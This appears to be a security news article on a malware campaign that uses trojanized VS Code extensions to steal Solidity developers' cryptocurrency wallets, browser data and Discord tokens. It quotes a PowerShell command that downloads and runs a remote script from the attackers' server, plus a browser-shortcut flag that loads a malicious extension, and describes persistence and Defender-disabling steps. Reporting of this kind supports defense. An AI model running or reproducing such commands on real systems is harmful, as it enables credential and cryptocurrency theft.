A sophisticated campaign targeting Solidity developers has emerged, utilizing Visual Studio Code’s popularity and extension ecosystem as an attack vector.

Threat actors have deployed trojanized extensions that masquerade as developer utilities while secretly exfiltrating cryptocurrency wallet credentials and other sensitive information from victim systems.

These extensions are particularly dangerous as they target developers who often have access to valuable blockchain assets and infrastructure, making them high-value targets for cryptocurrency theft.

Three malicious extensions have been identified in the VS Code Marketplace: solaibot, among-eth, and blankebesxstnion.

These extensions claim to provide advanced features like syntax scanning and vulnerability detection for Solidity developers but conceal harmful code behind genuine functionality.

Though removed from the Marketplace, the extensions were downloaded approximately 50 times before detection, potentially compromising numerous development environments and cryptocurrency wallets.

DATADOG Security Labs researchers identified the threat actor behind this campaign, tracking them as MUT-9332 (Mysterious Unattributed Threat).

The security team discovered that this same threat actor was previously responsible for a separate campaign distributing a Monero cryptominer via backdoored VS Code extensions, which had reportedly reached up to one million downloads.

The malicious extensions exploit the generous permissions granted to VS Code extensions, which can read code and environment variables, register commands, modify configurations, and execute system commands as the current user.

This creates an ideal environment for infiltration, as developers often install extensions with minimal scrutiny, trusting the Marketplace’s automated security scanning to filter out malicious content.

What makes these extensions particularly effective is their dual nature – providing actual functionality relevant to Solidity developers while simultaneously executing their malicious payload chain, thereby avoiding suspicion while operating on the victim’s system.

Sophisticated Multi-Stage Infection Chain

The infection mechanism employed by these extensions demonstrates remarkable complexity, using multiple stages of obfuscation and evasion techniques.

The initial attack begins in the extension.js file, which contains legitimate Solidity utilities but also hides malicious code that communicates with a command and control server at solidity[.]bot.

When executed on Windows systems, the server returns a seemingly innocuous version check that actually delivers the first-stage payload:-

powershell -ExecutionPolicy Bypass -Command "irm https://solidity[.]bot/a.txt | iex"

This command downloads and executes a PowerShell script that installs a malicious browser extension (extension.zip) into Chromium-based browsers. The script modifies browser shortcuts to load this extension at startup by appending the parameter:

--load-extension="$env:APPDATA\CheckExtension"

The infection chain then branches into multiple paths, displaying redundancy to ensure successful payload delivery and evade detection.

One path leads to myau.exe, which establishes persistence by adding registry keys and disabling Windows Defender.

It also employs a volatile anti-forensic technique that causes the system to crash if the malware process is terminated.

Perhaps most creative is the use of steganography-like techniques, where one payload retrieves an image file (new_image.jpg) from the Internet Archive containing Base64-encoded malware.

While not true steganography, this technique helps bypass security controls that might not inspect image files for malicious code.

The ultimate goal of this elaborate infection chain is credential theft, with the malware targeting cryptocurrency wallets, browser data, and Discord tokens before exfiltrating them to attacker infrastructure at m-vn[.]ws/bird.php.

Equip your SOC team with deep threat analysis for faster response -> Get Extra 𝗦𝗮𝗻𝗱𝗯𝗼𝘅 𝗹𝗶𝗰𝗲𝗻𝘀𝗲𝘀 for Free